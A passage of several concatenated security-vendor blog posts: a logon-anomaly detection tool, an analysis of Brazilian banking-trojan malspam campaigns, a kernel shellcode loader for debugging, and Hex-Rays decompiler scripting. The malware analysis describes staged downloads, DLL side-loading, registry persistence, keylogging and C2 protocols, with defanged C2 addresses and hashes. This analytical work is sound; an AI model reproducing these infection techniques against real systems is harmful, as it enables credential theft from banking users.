  2. Email client or web applications
  3. Remote desktop environments such as Citrix
  4. Internet-facing applications
Usage

GeoLogonalyzer’s built-in –csv input type accepts CSV formatted input with the following considerations:

  1. Input must be sorted by timestamp.
  2. Input timestamps must all be in the same time zone, preferably UTC, to avoid seasonal changes such as daylight savings time.
  3. Input format must match the following CSV structure – this will likely require manually parsing or reformatting existing log formats:

YYYY-MM-DD HH:MM:SS, username, source IP, optional source hostname, optional VPN client details

GeoLogonalyzer’s code comments include instructions for adding customized log format support. Due to the various VPN log formats exported from VPN server manufacturers, version 1.0 of GeoLogonalyzer does not include support for raw VPN server logs.

GeoLogonalyzer Usage

Example Input

Figure 1 represents an example input VPNLogs.csv file that recorded eight authentication events for the two user accounts Meghan and Harry. The input data is commonly derived from logs exported directly from an application administration console or SIEM.  Note that this example dataset was created entirely for demonstration purposes.


Figure 1: Example GeoLogonalyzer input

Example Windows Executable Command

GeoLogonalyzer.exe --csv VPNLogs.csv --output GeoLogonalyzedVPNLogs.csv

Example Python Script Execution Command

python GeoLogonalyzer.py --csv VPNLogs.csv --output GeoLogonalyzedVPNLogs.csv

Example Output

Figure 2 represents the example output GeoLogonalyzedVPNLogs.csv file, which shows relevant data from the authentication source changes (highlights have been added for emphasis and some columns have been removed for brevity):


Figure 2: Example GeoLogonalyzer output

Analysis

In the example output from Figure 2, GeoLogonalyzer helps identify the following anomalies in the Harry account’s logon patterns:

  1. FAST - For Harry to physically log on from New York and subsequently from Australia in the recorded timeframe, Harry needed to travel at a speed of 4,297 miles per hour.
  2. DISTANCE – Harry’s 8,990 mile trip from New York to Australia might not be expected travel.
  3. DCH – Harry’s logon from Australia originated from an IP address associated with a datacenter hosting provider.
  4. HOSTNAME and CLIENT – Harry logged on from different systems using different VPN client software, which may be against policy.
  5. ASN – Harry’s source IP addresses did not belong to the same ASN. Using ASN analysis helps cut down on reviewing logons with different source IP addresses that belong to the same provider. Examples include logons from different campus buildings or an updated residential IP address.

Manual analysis of the data could also reveal anomalies such as:

  1. Countries or regions where no business takes place, or where there are no employees located
  2. Datacenters that are not expected
  3. ASN names that are not expected, such as a university
  4. Usernames that should not log on to the service
  5. Unapproved VPN client software names
  6. Hostnames that are not part of the environment, do not match standard naming conventions, or do not belong to the associated user

While it may be impossible to determine if a logon pattern is malicious based on this data alone, analysts can use GeoLogonalyzer to flag and investigate potentially suspicious logon activity through other investigative methods.

GeoLogonalyzer Limitations

Reserved Addresses

Any RFC1918 source IP addresses, such as 192.168.X.X and 10.X.X.X, will not have a physical location registered in the MaxMind database. By default, GeoLogonalyzer will use the coordinates (0, 0) for any reserved IP address, which may alter results. Analysts can manually edit these coordinates, if desired, by modifying the RESERVED_IP_COORDINATES constant in the Python script.

Setting this constant to the coordinates of your office location may provide the most accurate results, although may not be feasible if your organization has multiple locations or other point-to-point connections.

GeoLogonalyzer also accepts the parameter –skip_rfc1918, which will completely ignore any RFC1918 source IP addresses and could result in missed activity.

Failed Logon and Logoff Data

It may also be useful to include failed logon attempts and logoff records with the log source data to see anomalies related to source information of all VPN activity. At this time, GeoLogonalyzer does not distinguish between successful logons, failed logon attempts, and logoff events. GeoLogonalyzer also does not detect overlapping logon sessions from multiple source IP addresses.

False Positive Factors

Note that the use of VPN or other tunneling services may create false positives. For example, a user may access an application from their home office in Wyoming at 08:00 UTC, connect to a VPN service hosted in Georgia at 08:30 UTC, and access the application again through the VPN service at 09:00 UTC. GeoLogonalyzer would process this application access log and detect that the user account required a FAST travel rate of roughly 1,250 miles per hour which may appear malicious. Establishing a baseline of legitimate authentication patterns is recommended to understand false positives.

Reliance on Open Source Data

GeoLogonalyzer relies on open source data to make cloud hosting provider determinations. These lookups are only as accurate as the available open source data.

Preventing Remote Access Abuse

Understanding that no single analysis method is perfect, the following recommendations can help security teams prevent the abuse of remote access platforms and investigate suspected compromise.

  1. Identify and limit remote access platforms that allow access to sensitive information from the Internet, such as VPN servers, systems with RDP or SSH exposed, third-party applications (e.g., Citrix), intranet sites, and email infrastructure.
  2. Implement a multi-factor authentication solution that utilizes dynamically generated one-time use tokens for all remote access platforms.
  3. Ensure that remote access authentication logs for each identified access platform are recorded, forwarded to a log aggregation utility, and retained for at least one year.
  4. Whitelist IP address ranges that are confirmed as legitimate for remote access users based on baselining or physical location registrations. If whitelisting is not possible, blacklist IP address ranges registered to physical locations or cloud hosting providers that should never legitimately authenticate to your remote access portal.
  5. Utilize either SIEM capabilities or GeoLogonalyzer.py to perform GeoFeasibility analysis of all remote access on a regular frequency to establish a baseline of accounts that legitimately perform unexpected logon activity and identify new anomalies. Investigating anomalies may require contacting the owner of the user account in question. FireEye Helix analyzes live log data for all techniques utilized by GeoLogonalyzer, and more!

Download GeoLogonalyzer today.

Acknowledgements

Christopher Schmitt, Seth Summersett, Jeff Johns, and Alexander Mulfinger.

Metamorfo Campaigns Targeting Brazilian Users

24 April 2018 at 15:00

FireEye Labs recently identified several widespread malspam (malware spam) campaigns targeting Brazilian companies with the goal of delivering banking Trojans. We are referring to these campaigns as Metamorfo. Across the stages of these campaigns, we have observed the use of several tactics and techniques to evade detection and deliver the malicious payload. In this blog post we dissect two of the main campaigns and explain how they work.

Campaign #1

The kill chain starts with an email containing an HTML attachment with a refresh tag that uses a Google URL shortener as the target. Figure 1 shows a sample email, and Figure 2 show the contents of the HTML file.


Figure 1: Malicious Email with HTML Attachment


Figure 2: Contents of HTML File

When the URL is loaded, it redirects the victim to a cloud storage site such as GitHub, Dropbox, or Google Drive to download a ZIP file. An example is shown in Figure 3.


Figure 3: URL Shortener Redirects to Github Link

The ZIP archive contains a malicious portable executable (PE) file with embedded HTML application (HTA). The user has to unzip the archive and double-click the executable for the infection chain to continue. The PE file is a simple HTA script compiled into an executable. When the user double-clicks the executable, the malicious HTA file is extracted to %temp% and executed by mshta.exe.

The HTA script (Figure 4) contains VBS code that fetches a second blob of VBS code encoded in base64 form from hxxp://<redacted>/ilha/pz/logs.php. 


Figure 4: Contents of HTA File

After the second stage of VBS is decoded (Figure 5 and Figure 6), the script downloads the final stage from hxxp://<redacted>/28022018/pz.zip. 


Figure 5: Contents of Decoded VBS


Figure 6: More Contents of Decoded VBS

The downloaded ZIP file contains four files. Two are PE files. One is a legitimate Windows tool, pvk2pfx.exe, that is abused for DLL side-loading. One is the malicious banking Trojan as the DLL.

The VBS code unzips the archive, changes the extension of the legitimate Windows tool from .png to .exe, and renames the malicious DLL as cryptui.dll. The VBS code also creates a file in C:\Users\Public\Administrador\car.dat with random strings. These random strings are used to name the Windows tool, which is then executed. Since this tool depends on a legitimate DLL named cryptui.dll, the search order path will find the malicious Trojan with the same name in the same directory and load it into its process space.

In Q4 of 2017, a similar malspam campaign delivered the same banking Trojan by using an embedded JAR file attached in the email instead of an HTML attachment. On execution, the Java code downloaded a ZIP archive from a cloud file hosting site such as Google Drive, Dropbox, or Github. The ZIP archive contained a legitimate Microsoft tool and the malicious Trojan.

Banking Trojan Analysis

The Trojan expects to be located in the hardcoded directory C:\\Users\\Public\Administrador\\ along with three other files to start execution. As seen in Figure 7, these files are:

  • car.dat (randomly generated name given to Windows tool)
  • i4.dt (VBS script that downloads the same zip file)
  • id (ID given to host)
  • cryptui.dll (malicious Trojan)


Figure 7: Contents of ZIP Archive

Persistence

The string found in the file C:\\Users\\Public\\Administrador\\car.dat is extracted and used to add the registry key Software\Microsoft\Windows\CurrentVersion\Run\<string from car.dat> for persistence, as shown in Figure 8.


Figure 8: Reading from car.dat File

The sample also looks for a file named i4.dt in the same directory and extracts the contents of it, renames the file to icone.vbs, and creates a new persistent key (Figure 9) in \Software\Microsoft\Windows\CurrentVersion\Run to open this file.


Figure 9: Persistence Keys

The VBS code in this file (Figure 10) has the ability to recreate the whole chain and download the same ZIP archive.


Figure 10: Contents of VBS Script

Next, the Trojan searches for several folders in the Program Files directories, including:

  • C:\\Program Files\\AVG
  • C:\\Program Files\\AVAST Software
  • C:\\Program Files\\Diebold\\Warsaw
  • C:\\Program Files\\Trusteer\\Rapport
  • C:\\Program Files\\Java
  • C:\\Program Files (x86)\\scpbrad

If any of the folders are found, this information, along with the hostname and Operating System version, is sent to a hardcoded domain with the hardcoded User-Agent value “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0” in the format shown in Figure 11. The value of AT is “<host_name+OS&MD>=<list of folders found>”.


Figure 11: Network Traffic for Host Enumeration

The sample iterates through the running processes, kills the following, and prevents them from launching:

  • msconfig.exe
  • TASKMGR.exe
  • regedit.exe
  • ccleaner64.exe
  • taskmgr.exe
  • itauaplicativo.exe

Next, it uses GetForegroundWindow to get a handle to the window the user is viewing and GetWindowText to extract the title of the window. The title is compared against a hardcoded list of Brazilian banking and digital coin sites. The list is extensive and includes major organizations and smaller entities alike. 

If any of those names are found and the browser is one of the following, the Trojan will terminate that browser.

  • firefox.exe
  • chrome.exe
  • opera.exe
  • safari.exe

The folder C:\Users\Public\Administrador\logs\ is created to store screenshots, as well as the number of mouse clicks the user has triggered while browsing the banking sites (Figure 12). The screenshots are continuously saved as .jpg images.


Figure 12: Malware Capturing Mouse Clicks

Command and Control

The command and control (C2) server is selected based on the string in the file “id”:

  • al -> '185.43.209[.]182'
  • gr -> '212.237.46[.]6'
  • pz -> '87.98.146[.]34'
  • mn -> ’80.211.140[.]235'

The connection to one of the hosts is then started over raw TCP on port 9999. The command and control communication generally follows the pattern <|Command |>, for example:

  • '<|dispida|>logs>SAVE<' sends the screenshots collected in gh.txt.
  • '<PING>' is sent from C2 to host, and '<PONG>' is sent from host to C2, to keep the connection alive.
  • '<|INFO|>' retrieves when the infection first started based on the file timestamp from car.dat along with '<|>' and the host information.

There were only four possible IP addresses that the sample analyzed could connect to based on the strings found in the file “id”. After further researching the associated infrastructure of the C2 (Figure 13), we were able to find potential number of victims for this particular campaign.

 

Figure 13: Command and Control Server Open Directories

Inside the open directories, we were able to get the following directories corresponding to the different active campaigns. Inside each directory we could find statistics with the number of victims reporting to the C2. As of 3/27/2018, the numbers were:

  • al – 843
  • ap – 879
  • gr – 397
  • kk – 2,153
  • mn – 296
  • pz – 536
  • tm – 187

A diagram summarizing Campaign #1 is shown in Figure 14.


Figure 14: Infection Chain of Campaign #1

Campaign #2

In the second campaign, FireEye Labs observed emails with links to legitimate domains (such as hxxps://s3-ap-northeast-1.amazonaws[.]com/<redacted>/Boleto_Protesto_Mes_Marco_2018.html) or compromised domains (such as hxxps://curetusu.<redacted>-industria[.]site/) that use a refresh tag with a URL shortener as the target. The URL shortener redirects the user to an online storage site, such as Google Drive, Github, or Dropbox, that hosts a malicious ZIP file. A sample phishing email is shown in Figure 15.


Figure 15: Example Phishing Email

The ZIP file contains a malicious executable written in AutoIt (contents of this executable are shown in Figur 16). When executed by the user, it drops a VBS file to a randomly created and named directory (such as C:\mYPdr\TkCJLQPX\HwoC\mYPdr.vbs) and fetches contents from the C2 server.


Figure 16: Contents of Malicious AutoIt Executable

Two files are downloaded from the C2 server. One is a legitimate Microsoft tool and the other is a malicious DLL: 

  • https[:]//panel-dark[.]com/w3af/img2.jpg
  • https[:]//panel-dark[.]com/w3af/img1.jpg

Those files are downloaded and saved into random directories named with the following patterns:

  • <current user dir>\<5 random chars>\<8 random chars>\<4 random chars>\<5 random chars>.exe
  • <current user dir>\<5 random chars>\<8 random chars>\<4 random chars>\CRYPTUI.dll 

The execution chain ensures that persistence is set on the affected system using a .lnk file in the Startup directory. The .lnk file shown in Figure 17 opens the malicious VBS dropped on the system.


Figure 17: Persistence Key

The VBS file (Figure 18) will launch and execute the downloaded legitimate Windows tool, which in this case is Certmgr.exe. This tool will be abused using the DLL side loading technique. The malicious Cryptui.dll is loaded into the program instead of the legitimate one and executed.


Figure 18: Contents of Dropped VBS File

Banking Trojan Analysis

Like the Trojan from the first campaign, this sample is executed through search-order hijacking. In this case, the binary abused is a legitimate Windows tool, Certmgr.exe, that loads Cryptui.dll. Since this tool depends on a legitimate DLL named cryptui.dll, the search order path will find the malicious Trojan with the same name in the same directory and load it into its process space.

The malicious DLL exports 21 functions. Only DllEntryPoint contains real code that is necessary to start the execution of the malicious code. The other functions return hardcoded values that serve no real purpose.

On execution, the Trojan creates a mutex called "correria24" to allow only one instance of it to run at a time.

The malware attempts to resolve “www.goole[.]com” (most likely a misspelling). If successful, it sends a request to hxxp://api-api[.]com/json in order to detect the external IP of the victim. The result is parsed and execution continues only if the country code matches “BR”, as shown in Figure 19.


Figure 19: Country Code Check

The malware creates an empty file in %appdata%\Mariapeirura on first execution, which serves as a mutex lock, before attempting to send any collected information to the C2 server. This is done in order to get only one report per infected host.

The malware collects host information, base64 encodes it, and sends it to two C2 servers. The following items are gathered from the infected system:

  • OS name
  • OS version
  • OS architecture
  • AV installed
  • List of banking software installed
  • IP address
  • Directory where malware is being executed from

The information is sent to hxxp://108.61.188.171/put.php (Figure 20).


Figure 20: Host Recon Data Sent to First C2 Server

The same information is sent to panel-dark[.]com/Contador/put.php (Figure 21).


Figure 21: Host Recon Data Sent to Second C2 Server

The malware alters the value of registry key Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ExtendedUIHoverTime to 2710 in order to change the number of milliseconds a thumbnail is showed while hovering on the taskbar, as seen in Figure 22.


Figure 22: ExtendedUIHoverTime Registry Key Change

Like the Trojan from the first campaign, this sample checks if the foreground window's title contains names of Brazilian banks and digital coins by looking for hardcoded strings.

The malware displays fake forms on top of the banking sites and intercepts credentials from the victims. It can also display a fake Windows Update whenever there is nefarious activity in the background, as seen in Figure 23.


Figure 23: Fake Form Displaying Windows Update

The sample also contains a keylogger functionality, as shown in Figure 24.


Figure 24: Keylogger Function

Command and Control

The Trojan’s command and control command structure is identical to the first sample. The commands are denoted by the <|Command|> syntax.

  • <|OK|> gets a list of banking software installed on the host.
  • '<PING>' is sent from C2 to host, and '<PONG>' is sent from host to C2, to keep connection alive.
  • <|dellLemb|> deletes the registry key \Software\Microsoft\Internet Explorer\notes.
  • EXECPROGAM calls ShellExecute to run the application given in the command.
  • EXITEWINDOWS calls ExitWindowsEx.
  • NOVOLEMBRETE creates and stores data sent with the command in the registry key \Software\Microsoft\Internet Explorer\notes.


Figure 25: Partial List of Victims

This sample contains most of the important strings encrypted. We provide the following script (Figure 26) in order to decrypt them.


Figure 26: String Decryption Script

Conclusion

The use of multi-stage infection chains makes it challenging to research these types of campaigns all the way through.

As demonstrated by our research, the attackers are using various techniques to evade detection and infect unsuspecting Portuguese-speaking users with banking Trojans. The use of public cloud infrastructure to help deliver the different stages plays a particularly big role in delivering the malicious payload. The use of different infection methods combined with the abuse of legitimate signed binaries to load malicious code makes these campaigns worth highlighting.

Indicators of Compromise

Campaign #1
TYPE HASH DESCRIPTION
MD5 860fa744d8c82859b41e00761c6e25f3 PE with Embedded HTA
MD5 3e9622d1a6d7b924cefe7d3458070d98 PE with Embedded HTA
MD5 f402a482fd96b0a583be2a265acd5e74 PE with Embedded HTA
MD5 f329107f795654bfc62374f8930d1e12 PE with Embedded HTA
MD5 789a021c051651dbc9e01c5d8c0ce129 PE with Embedded HTA
MD5 68f818fa156d45889f36aeca5dc75a81 PE with Embedded HTA
MD5 c2cc04be25f227b13bcb0b1d9811e2fe cryptui.dll
MD5 6d2cb9e726c9fac0fb36afc377be3aec id
MD5 dd73f749d40146b6c0d2759ba78b1764 i4.dt
MD5 d9d1e72165601012b9d959bd250997b3 VBS file with commands to create staging directories for malware
MD5 03e4f8327fbb6844e78fda7cdae2e8ad pvk2pfx.exe [Legit Windows Tool]
URL   hxxp://5.83.162.24/ilha/pz/logs.php
URL   hxxp://5.83.162.24/28022018/pz.zip 
C2   ibamanetibamagovbr[.]org/virada/pz/logs.php
URL   sistemasagriculturagov[.]org
URL   hxxp://187.84.229.107/05022018/al.zip
Campaign #2
TYPE HASH DESCRIPTION
MD5 2999724b1aa19b8238d4217565e31c8e AutoIT Dropper
MD5 181c8f19f974ad8a84b8673d487bbf0d img1.jpg [lLegit Windows Tool]
MD5 d3f845c84a2bd8e3589a6fbf395fea06 img2.jpg [Banking Trojan]
MD5 2365fb50eeb6c4476218507008d9a00b Variants of Banking Trojan
MD5 d726b53461a4ec858925ed31cef15f1e Variants of Banking Trojan
MD5 a8b2b6e63daf4ca3e065d1751cac723b Variants of Banking Trojan
MD5 d9682356e78c3ebca4d001de760848b0 Variants of Banking Trojan
MD5 330721de2a76eed2b461f24bab7b7160 Variants of Banking Trojan
MD5 6734245beda04dcf5af3793c5d547923 Variants of Banking Trojan
MD5 a920b668079b2c1b502fdaee2dd2358f Variants of Banking Trojan
MD5 fe09217cc4119dedbe85d22ad23955a1 Variants of Banking Trojan
MD5 82e2c6b0b116855816497667553bdf11 Variants of Banking Trojan
MD5 4610cdd9d737ecfa1067ac30022d793b Variants of Banking Trojan
MD5 34a8dda75aea25d92cd66da53a718589 Variants of Banking Trojan
MD5 88b808d8164e709df2ca99f73ead2e16 Variants of Banking Trojan
MD5 d3f845c84a2bd8e3589a6fbf395fea06 Variants of Banking Trojan
MD5 28a0968163b6e6857471305aee5c17e9 Variants of Banking Trojan
MD5 1285205ae5dd5fa5544b3855b11b989d Variants of Banking Trojan
MD5 613563d7863b4f9f66590064b88164c8 Variants of Banking Trojan
MD5 3dd43e69f8d71fcc2704eb73c1ea7daf Variants of Banking Trojan
C2   https[:]//panel-dark[.]com/w3af/img2.jpg 
C2   https[:]//panel-dark[.]com/w3af/img1.jpg 

Loading Kernel Shellcode

23 April 2018 at 15:00

In the wake of recent hacking tool dumps, the FLARE team saw a spike in malware samples detonating kernel shellcode. Although most samples can be analyzed statically, the FLARE team sometimes debugs these samples to confirm specific functionality. Debugging can be an efficient way to get around packing or obfuscation and quickly identify the structures, system routines, and processes that a kernel shellcode sample is accessing.

This post begins a series centered on kernel software analysis, and introduces a tool that uses a custom Windows kernel driver to load and execute Windows kernel shellcode. I’ll walk through a brief case study of some kernel shellcode, how to load shellcode with FLARE’s kernel shellcode loader, how to build your own copy, and how it works.

As always, only analyze malware in a safe environment such as a VM; never use tools such as a kernel shellcode loader on any system that you rely on to get your work done.

A Tale of Square Pegs and Round Holes

Depending upon how a shellcode sample is encountered, the analyst may not know whether it is meant to target user space or kernel space. A common triage step is to load the sample in a shellcode loader and debug it in user space. With kernel shellcode, this can have unexpected results such as the access violation in Figure 1.


Figure 1: Access violation from shellcode dereferencing null pointer

The kernel environment is a world apart from user mode: various registers take on different meanings and point to totally different structures. For instance, while the gs segment register in 64-bit Windows user mode points to the Thread Information Block (TIB) whose size is only 0x38 bytes, in kernel mode it points to the Processor Control Region (KPCR) which is much larger. In Figure 1 at address 0x2e07d9, the shellcode is attempting to access the IdtBase member of the KPCR, but because it is running in user mode, the value at offset 0x38 from the gs segment is null. This causes the next instruction to attempt to access invalid memory in the NULL page. What the code is trying to do doesn’t make sense in the user mode environment, and it has crashed as a result.

In contrast, kernel mode is a perfect fit. Figure 2 shows WinDbg’s dt command being used to display the _KPCR type defined within ntoskrnl.pdb, highlighting the field at offset 0x38 named IdtBase.


Figure 2: KPCR structure

Given the rest of the code in this sample, accessing the IdtBase field of the KPCR made perfect sense. Determining that this was kernel shellcode allowed me to quickly resolve the rest of my questions, but to confirm my findings, I wrote a kernel shellcode loader. Here’s what it looks like to use this tool to load a small, do-nothing piece of shellcode.

Using FLARE’s Kernel Shellcode Loader

I booted a target system with a kernel debugger and opened an administrative command prompt in the directory where I copied the shellcode loader (kscldr.exe). The shellcode loader expects to receive the name of the file on disk where the shellcode is located as its only argument. Figure 3 shows an example where I’ve used a hex editor to write the opcodes for the NOP (0x90) and RET (0xC3) instructions into a binary file and invoked kscldr.exe to pass that code to the kernel shellcode loader driver. I created my file using the Windows port of xxd that comes with Vim for Windows.


Figure 3: Using kscldr.exe to load kernel shellcode

The shellcode loader prompts with a security warning. After clicking yes, kscldr.exe installs its driver and uses it to execute the shellcode. The system is frozen at this point because the kernel driver has already issued its breakpoint and the kernel debugger is awaiting commands. Figure 4 shows WinDbg hitting the breakpoint and displaying the corresponding source code for kscldr.sys.


Figure 4: Breaking in kscldr.sys

From the breakpoint, I use WinDbg with source-level debugging to step and trace into the shellcode buffer. Figure 5 shows WinDbg’s disassembly of the buffer after doing this.


Figure 5: Tracing into and disassembling the shellcode

The disassembly shows the 0x90 and 0xc3 opcodes from before, demonstrating that the shellcode buffer is indeed being executed. From here, the powerful facilities of WinDbg are available to debug and analyze the code’s behavior.

Building It Yourself

To try out FLARE’s kernel shellcode loader for yourself, you’ll need to download the source code.

To get started building it, download and install the Windows Driver Kit (WDK). I’m using Windows Driver Kit Version 7.1.0, which is command line driven, whereas more modern versions of the WDK integrate with Visual Studio. If you feel comfortable using a newer kit, you’re welcomed to do so, but beware, you’ll have to take matters into your own hands regarding build commands and dependencies. Since WDK 7.1.0 is adequate for purposes of this tool, that is the version I will describe in this post.

Once you have downloaded and installed the WDK, browse to the Windows Driver Kits directory in the start menu on your development system and select the appropriate environment. Figure 6 shows the WDK program group on a Windows 7 system. The term “checked build” indicates that debugging checks will be included. I plan to load 64-bit kernel shellcode, and I like having Windows catch my mistakes early, so I’m using the x64 Checked Build Environment.


Figure 6: Windows Driver Kits program group

In the WDK command prompt, change to the directory where you downloaded the FLARE kernel shellcode loader and type ez.cmd. The script will cause prompts to appear asking you to supply and use a password for a test signing certificate. Once the build completes, visit the bin directory and copy kscldr.exe to your debug target. Before you can commence using your custom copy of this tool, you’ll need to follow just a few more steps to prepare the target system to allow it.

Preparing the Debug Target

To debug kernel shellcode, I wrote a Windows software-only driver that loads and runs shellcode at privilege level 0. Normally, Windows only loads drivers that are signed with a special cross-certificate, but Windows allows you to enable testsigning to load drivers signed with a test certificate. We can create this test certificate for free, and it won’t allow the driver to be loaded on production systems, which is ideal.

In addition to enabling testsigning mode, it is necessary to enable kernel debugging to be able to really follow what is happening after the kernel shellcode gains execution. Starting with Windows Vista, we can enable both testsigning and kernel debugging by issuing the following two commands in an administrative command prompt followed by a reboot:

bcdedit.exe /set testsigning on

bcdedit.exe /set debug on

For debugging in a VM, I install VirtualKD, but you can also follow your virtualization vendor’s directions for connecting a serial port to a named pipe or other mechanism that WinDbg understands. Once that is set up and tested, we’re ready to go!

If you try the shellcode loader and get a blue screen indicating stop code 0x3B (SYSTEM_SERVICE_EXCEPTION), then you likely did not successfully connect the kernel debugger beforehand. Remember that the driver issues a software interrupt to give control to the debugger immediately before executing the shellcode; if the debugger is not successfully attached, Windows will blue screen. If this was the case, reboot and try again, this time first confirming that the debugger is in control by clicking Debug -> Break in WinDbg. Once you know you have control, you can issue the g command to let execution continue (you may need to disable driver load notifications to get it to finish the boot process without further intervention: sxd ld).

How It Works

The user-space application (kscldr.exe) copies the driver from a PE-COFF resource to the disk and registers it as a Windows kernel service. The driver implements device write and I/O control routines to allow interaction from the user application. Its driver entry point first registers dispatch routines to handle CreateFile, WriteFile, DeviceIoControl, and CloseHandle. It then creates a device named \Device\kscldr and a symbolic link making the device name accessible from user-space. When the user application opens the device file and invokes WriteFile, the driver calls ExAllocatePoolWithTag specifying a PoolType of NonPagedPool (which is executable), and writes the buffer to the newly allocated memory. After the write operation, the user application can call DeviceIoControl to call into the shellcode. In response, the driver sets the appropriate flags on the device object, issues a breakpoint to pass control to the kernel debugger, and finally calls the shellcode as if it were a function.

While You’re Here

Driver development opens the door to unique instrumentation opportunities. For example, Figure 7 shows a few kernel callback routines described in the WDK help files that can track system-wide process, thread, and DLL activity.


Figure 7: WDK kernel-mode driver architecture reference

Kernel development is a deep subject that entails a great deal of study, but the WDK also comes with dozens upon dozens of sample drivers that illustrate correct Windows kernel programming techniques. This is a treasure trove of Windows internals information, security research topics, and instrumentation possibilities. If you have time, take a look around before you get back to work.

Wrap-Up

We’ve shared FLARE’s tool for loading privileged shellcode in test environments so that we can dynamically analyze kernel shellcode. We hope this provides a straightforward way to quickly triage kernel shellcode if it ever appears in your environment. Download the source code now.

Do you want to learn more about these tools and techniques from FLARE? Then you should take one of our Black Hat classes in Las Vegas this summer! Our offerings include Malware Analysis Crash Course, macOS Malware for Reverse Engineers, and Malware Analysis Master Class.

Solving Ad-hoc Problems with Hex-Rays API

10 April 2018 at 15:00

Introduction

IDA Pro is the de facto standard when it comes to binary reverse engineering. Besides being a great disassembler and debugger, it is possible to extend it and include a powerful decompiler by purchasing an additional license from Hex-Rays. The ability to switch between disassembled and decompiled code can greatly reduce the analysis time.

The decompiler (from now on referred to as Hex-Rays) has been around for a long time and has achieved a good level of maturity. However, there seems to be a lack of a concise and complete resources regarding this topic (tutorials or otherwise). In this blog, we aim to close that gap by showcasing examples where scripting Hex-Rays goes a long way.

Overview of a Decompiler

In order to understand how the decompiler works, it’s helpful to first review the normal compilation process.

Compilation and decompilation center around the concept of an Abstract Syntax Tree (AST). In essence, a compiler takes the source code, splits it into tokens according to a grammar, then these tokens are grouped into logical expressions. In this phase of the compilation process, referred to as parsing, the code structure is represented as a complex object, the AST. From the AST, the compiler will produce assembly code for the specified platform.

A decompiler takes the opposite route. From the given assembly code, it works back to produce an AST, and from this to produce pseudocode.

From all the intermediate steps between code and assembly, we are stressing the AST so much because most of the time you will spend using the Hex-Rays API, you will actually be reading and/or modifying the Abstract Syntax Tree (or ctree in Hex-Rays terminology).

Items, Expressions and Statements

Now we know that Hex-Rays’s ctree is a tree-like data structure. The nodes of this tree are either of type cinsn_t or cexpr_t. We will define these in a moment, but for now it is important to know that both derive from a very basic type, namely the citem_t type, as seen in the following code snippet:

Therefore, all nodes in the ctree will have the op property, which indicates the node type (variable, number, logical expression, etc.).

The type of op (ctype_t) is an enumeration where all constants are named either cit_<xyz> (for statements) or cot_<xyz> (for expressions). Keep this in mind, as it will be very important. A quick way to inspect all ctype_t constants and their values is to execute the following code snippet:

This produces the following output:

Let’s dive a bit deeper and explain the two types of nodes: expressions and statements.

It is useful to think about expressions as the “the little logical elements” of your code. They range from simple types such as variables, strings or numerical constants, to small code constructs (assignments, comparisons, additions, logical operations, array indexing, etc.).

These are of type cexpr_t, a large structure containing several members. The members that can be accessed depend on its op value. For example, the member n to obtain the numeric value only makes sense when dealing with constants.

On the other side, we have statements. These correlate roughly to language keywords (if, for, do, while, return, etc.) Most of them are related to control flow and can be thought as “the big picture elements” of your code.

Recapitulating, we have seen how the decompiler exposes this tree-like structure (the ctree), which consists of two types of nodes: expressions and statements. In order to extract information from or modify the decompiled code, we have to interact with the ctree nodes via methods dependent on the node type. However, the following question arises: “How do we reach the nodes?”

This is done via a class exposed by Hex-Rays: the tree visitor (ctree_visitor_t). This class has two virtual methods, visit_insn and visit_expr, that are executed when a statement or expression is found while traversing the ctree. We can create our own visitor classes by inheriting from this one and overloading the corresponding methods.

Example Scripts

In this section, we will use the Hex-Rays API to solve two real-world problems:

  • Identify calls to GetProcAddress to dynamically resolve Windows APIs, assigning the resulting address to a global variable.
  • Display assignments related to stack strings as characters instead of numbers, for easier readability.

GetProcAddress

The first example we will walk through is how to automatically handle renaming global variables that have been dynamically resolved at run time. This is a common technique malware uses to hide its capabilities from static analysis tools. An example of dynamically resolving global variables using GetProcAddress is shown in Figure 1.


Figure 1: Dynamic API resolution using GetProcAddress

There are several ways to rename the global variables, with the simplest being manual copy and paste. However, this task is very repetitive and can be scripted using the Hex-Rays API.

In order to write any Hex-Rays script, it is important to first visualize the ctree. The Hex-Rays SDK includes a sample, sample5, which can be used to view the current function’s ctree. The amount of data shown in a ctree for a function can be overwhelming. A modified version of the sample was used to produce a picture of a sub-ctree for the function shown in Figure 1. The sub-ctree for the single expression: 'dword_1000B2D8 = (int)GetProcAdress(v0, "CreateThread");' is shown in Figure 2.


Figure 2: Sub-ctree for GetProcAddress assignment

With knowledge of the sub-ctree in use, we can write a script to automatically rename all the global variables that are being assigned using this method.

The code to automatically rename all the local variables is shown in Figure 3. The code works by traversing the ctree looking for calls to the GetProcAddress function. Once found, the code takes the name of the function being resolved and finds the global variable that is being set. The code then uses the IDA MakeName API to rename the address to the correct function.


Figure 3: Function renaming global variables

After the script has been executed, we can see in Figure 4 that all the global variables have been renamed to the appropriate function name.


Figure 4: Global variables renamed

Stack Strings

Our next example is a typical issue when dealing with malware: stack strings. This is a technique aimed to make the analysis harder by using arrays of characters instead of strings in the code. An example can be seen in Figure 5; the malware stores each character’s ASCII value in the stack and then references it in the call to sprintf. At a first glance, it’s very difficult to say what is the meaning of this string (unless of course, you know the ASCII table by heart).


Figure 5: Hex-Rays decompiler output. Stack strings are difficult to read.

Our script will modify these assignments to something more readable. The important part of our code is the ctree visitor mentioned earlier, which is shown in Figure 6.


Figure 6: Custom ctree visitor

The logic implemented here is pretty straightforward. We define our subclass of a ctree visitor (line 1) and override its visit_expr method. This will only kick in when an assignment is found (line 9). Another condition to be met is that the left side of the assignment is a variable and the right side a number (line 15). Moreover, the numeric value must be in the readable ASCII range (lines 20 and 21).

Once this kind of expression is found, we will change the type of the right side from a number to a string (lines 26 to 31), and replace its numerical value by the corresponding ASCII character (line 32).

The modified pseudocode after running this script is shown in Figure 7.


Figure 7: Assigned values shown as characters

You can find the complete scripts in our FLARE GitHub repository under decompiler scripts

Conclusion

These two admittedly simple examples should be able to give you an idea of the power of IDA’s decompiler API. In this post we have covered the foundations of all decompiler scripts: the ctree object, a structure composed by expressions and statements representing every element of the code as well the relationships between them. By creating a custom visitor we have shown how to traverse the tree and read or modify the code elements, therefore analyzing or modifying the pseudocode.

Hopefully, this post will motivate you to start writing your own scripts. This is only the beginning!

Do you want to learn more about these tools and techniques from FLARE? Then you should take one of our Black Hat classes in Las Vegas this summer! Our offerings include Malware Analysis Crash Course, macOS Malware for Reverse Engineers, and Malware Analysis Master Class.

References

Although written in 2009, one of the best references is still the original article on the Hex-Rays blog.

Fake Software Update Abuses NetSupport Remote Access Tool

